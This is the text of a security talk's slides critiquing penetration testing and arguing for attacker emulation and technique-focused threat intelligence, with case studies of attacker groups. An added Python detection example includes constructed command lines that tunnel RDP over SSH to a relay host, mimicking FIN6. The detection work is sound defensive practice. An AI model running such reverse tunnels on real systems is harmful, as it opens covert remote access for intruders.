Julian Cohen | @HockeyInJune
• Product Security | Flatiron Health
Previously
• Application Security | Financial Services
• Vulnerability Researcher | Defense Contracting
• Penetration Tester | Boutique Consulting
• Educator | Universities
Tonsillectomies in 1930
“It is a little difficult to believe that among the mass of tonsillectomies performed to-day all subjects for operation are selected with true discrimination, and one cannot avoid the conclusion that there is a tendency for the operation to be performed as a routine prophylactic ritual for no particular reason and with no particular result.”
http://ije.oxfordjournals.org/content/37/1/9.full
Modern Security Medicine
Doctors were recommending the procedure and patients were having the procedure, regardless of its effectiveness.
The expected results of the procedure did not match the actual results, but no one noticed or changed anything.
Penetration Testing Market Survey
• http://eprints.lancs.ac.uk/74275/1/Penetration_testing_online_2.pdf
Penetration Testing Considered Harmful
• Haroon Meer, 2010, 44CON
• Limited Scope
• Bad Testers
• Poor OPSEC
• The penetration testing industry is a market for lemons
http://blog.thinkst.com/p/penetration-testing-considered-harmful.html
http://www.econ.yale.edu/~dirkb/teach/pdf/akerlof/themarketforlemons.pdf
The Wrong Findings In The Right Places
Penetration testing misses highly likely attacks because the vulnerabilities that our penetration testers discover are not the vulnerabilities that real attackers discover.
Attacker Fallacies
Resourced Attackers
Motivated Attackers
Intelligent Attackers
http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf
http://blog.trailofbits.com/2013/05/20/writing-exploits-with-the-elderwood-kit-part-2/
Attacker Playbooks
“All attackers are resource constrained” — @dinodaizovi
“All attackers have a boss and a budget” — @philvenables
Resource-constrained attackers favor low-overhead attacks
Low overhead requires good scalability
Attackers who have multiple targets care about repeatability and scalability
Attackers operate like efficient businesses
• Experts at the top
• Employees are cheap and complete simple tasks
• Employees who don't meet their goals are fired
• Inefficient organizations fail quickly
Penetration testers operate like hobbyists
• All employees are experts
• Employees are expensive
• Employees who do not produce are hard to fire
• Organizations that do not produce do not fail
• Customers rarely care about output
Attackers
In defense, we often mistake attacker efficiency for inadequacy
Attackers focus on inexpensive but effective methods
Defenders are not effective against certain attackers because we do not understand the methods by which they operate
Complexity of Solution
http://www.slideshare.net/scovetta/2011-‐11-‐07-‐cyber-‐colloquium-‐zatko
• If you don't like the game, hack the playbook…
• Peiter “Mudge” Zatko, 2011
• Everywhere
Attacker Cost Graph
https://www.trailofbits.com/resources/attacker_math_101_slides.pdf
• Attacker “Math” 101
• Dino Dai Zovi, 2011
• SOURCE Boston, SummerCon
Case Study: Syrian Electronic Army
• Similar to: Lizard Squad and Anonymous
• Politically-motivated, low-resourced attackers
• DNS hijacking by phishing DNS providers
• Website defacing on shared hosting providers
• DDoS attacks with custom software
• Botnets created with opportunistic vulnerabilities
• Little to no post-exploitation
http://news.harvard.edu/gazette/story/2013/08/hack-attacks-explained/
http://www.infowar-monitor.net/2011/06/syrian-electronic-army-disruptive-attacks-and-hyped-targets/
Case Study: ShadowCrew
• Financially-motivated, low-resourced attackers
• Credit card data theft via SQL injection
• Typically targets one website at a time
• Scaled poorly with publicly available tools like sqlmap and havij
• Manual post-exploitation
http://www.wired.com/2010/03/tjx-sentencing/
Case Study: FIN6
• Financially-motivated, medium-resourced attackers
• Initial compromise via stolen credentials and phishing
• Network enumeration with publicly available tools
• Automatic search for AD servers and SQL servers with public tools
• Automatic collection and exfiltration of card information
• Command and control via RDP over SSH tunnels
• Uses known privilege escalation vulnerabilities on Windows
• Post-exploitation via Metasploit and other publicly available tools
https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf
https://attack.mitre.org/wiki/Group/G0037
Case Study: Elderwood
• Similar to: APT1
• State-sponsored, well-resourced attackers
• Mostly low-reliability Internet Explorer bugs
• ASLR/DEP bypasses with Microsoft Office/Java
• Exploits delivered via phishing and watering holes
• Post-exploitation via batch scripting and manual Windows commands
http://blog.trailofbits.com/2013/05/14/writing-exploits-with-the-elderwood-kit-part-1/
http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
Lockheed Martin’s Intrusion Kill Chain
http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf
• Eric M. Hutchins, Michael J. Cloppert, Rohan M. Amin, Ph.D.
• 6th International Conference on Information Warfare and Security (ICIW 11)
Attacker Emulation
Identify Attackers
Profile Attackers
Obtain Key Tactics
Rebuild Playbook
Replay Playbook
Utilize Results
Threat “Intelligence”
Instead of ephemeral information like IP addresses, MD5 hashes, and other indicators of compromise, we should be collecting and sharing indelible information on attacker techniques and procedures.
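As an added example that is not part of the original slides or of any vendor report, the Python script below contrasts the two kinds of intelligence over a few constructed process-creation records. A hash-based IOC match is run beside a technique-based rule loosely modelled on the FIN6 tactic listed in the case study (command and control via RDP over SSH tunnels). The host names, command lines, the "tool" bytes and their hashes are all constructed for the demonstration; the rule logic is the editor's, not FireEye's or MITRE's.

```python
"""Ephemeral indicators vs durable techniques (added example, constructed data).

Runs a hash-based IOC match and a technique-based rule over constructed
process-creation records. The technique rule is modelled loosely on the
FIN6 tactic above (RDP tunnelled over SSH); nothing here is taken from a
real report, binary or log.
"""
import hashlib
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str      # constructed host name
    image: str     # executable file name as logged
    cmdline: str   # full command line as logged
    sha256: str    # hash of the executable as observed on disk


def hash_of(payload: bytes) -> str:
    return hashlib.sha256(payload).hexdigest()


# Indicator-based detection: the shared IOC list carries the hash of the SSH
# client recovered from a previous intrusion (constructed bytes, not a real tool).
TOOL_V1 = b"attacker ssh client, build 1"
IOC_HASHES = {hash_of(TOOL_V1)}


def ioc_match(ev: ProcessEvent) -> bool:
    return ev.sha256 in IOC_HASHES


# Technique-based detection: an SSH client started with a -L or -R port forward
# that names the RDP port on either end, whatever binary provides the client.
SSH_CLIENTS = {"ssh", "ssh.exe", "plink.exe"}
FORWARD_RE = re.compile(r"(?:^|\s)-[LR]\s*(?P<spec>\S+)")
RDP_PORT = "3389"


def forwards_rdp(cmdline: str) -> bool:
    """True if any -L/-R spec (port:host:hostport or bind:port:host:hostport)
    has 3389 as the listening port or the destination port.
    Assumes IPv4 or hostname targets; bracketed IPv6 literals are not parsed."""
    for m in FORWARD_RE.finditer(cmdline):
        parts = m.group("spec").split(":")
        if len(parts) >= 3 and (parts[-3] == RDP_PORT or parts[-1] == RDP_PORT):
            return True
    return False


def technique_match(ev: ProcessEvent) -> bool:
    return ev.image.lower() in SSH_CLIENTS and forwards_rdp(ev.cmdline)


# Constructed telemetry. The attacker rebuilt the tool between the first and
# second host, so its hash changed while the technique did not. The third
# record is an ordinary administrative tunnel and should not alert.
TOOL_V2 = TOOL_V1 + b"\x00"
EVENTS = [
    ProcessEvent("pos-01", "ssh.exe",
                 "ssh.exe -N -R 3389:127.0.0.1:3389 relay@203.0.113.10",
                 hash_of(TOOL_V1)),
    ProcessEvent("pos-02", "ssh.exe",
                 "ssh.exe -N -R 0.0.0.0:3389:127.0.0.1:3389 relay@203.0.113.11",
                 hash_of(TOOL_V2)),
    ProcessEvent("admin-01", "ssh.exe",
                 "ssh.exe -N -L 8443:intranet.example:443 admin@bastion.example",
                 hash_of(b"vendor ssh client 8.9")),
]


def run_detections(events):
    """Map host -> (ioc_hit, technique_hit)."""
    return {ev.host: (ioc_match(ev), technique_match(ev)) for ev in events}


if __name__ == "__main__":
    for host, (ioc, ttp) in run_detections(EVENTS).items():
        print(f"{host:9s} ioc={str(ioc):5s} technique={ttp}")
```

Running it shows the point of the slide: the hash indicator fires on the first host and goes silent on the second after a one-byte rebuild, while the technique rule fires on both and stays quiet on the administrative tunnel because its port filter keys on 3389 rather than on the presence of SSH forwarding alone.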
Free Business Ideas
• Intelligence on attacker tactics and procedures
• Attack emulation service
• Which attacker groups I am vulnerable to
Attacker Emulation Example: RSA
Identify Attackers: Economic Espionage, Strategic Espionage
Profile Attackers: State-Sponsored, Well-Resourced
Obtain Key Tactics: Phishing, Watering Hole, Client-Side Exploitation
Rebuild Playbook: Public Reconnaissance, Phishing Campaigns, Client-Side Exploitation
Replay Playbook: Launch Attack
Utilize Results: Exploit Mitigation, Sandboxing, Execution Tree Analysis
Attacker Emulation Example: Flatiron
Identify Attackers: Financial Data Theft, Economic Espionage
Profile Attackers: Financially-Motivated, Mildly-Resourced
Obtain Key Tactics: Phishing and CEO Spam, Opportunistic Infection
Rebuild Playbook: Phishing Campaigns, Cheap Infection Tactics
Replay Playbook: Launch Attack
Utilize Results: E-Mail Scanning, Regular Patching, Malware Discovery
Thanks
• Nicholas Arvanitis
• Justin Berman
• Brandon Edwards
• Nick Freeman
• Andreas Lindh
• Chris Sandulow
• Phil Venables
• Dino Dai Zovi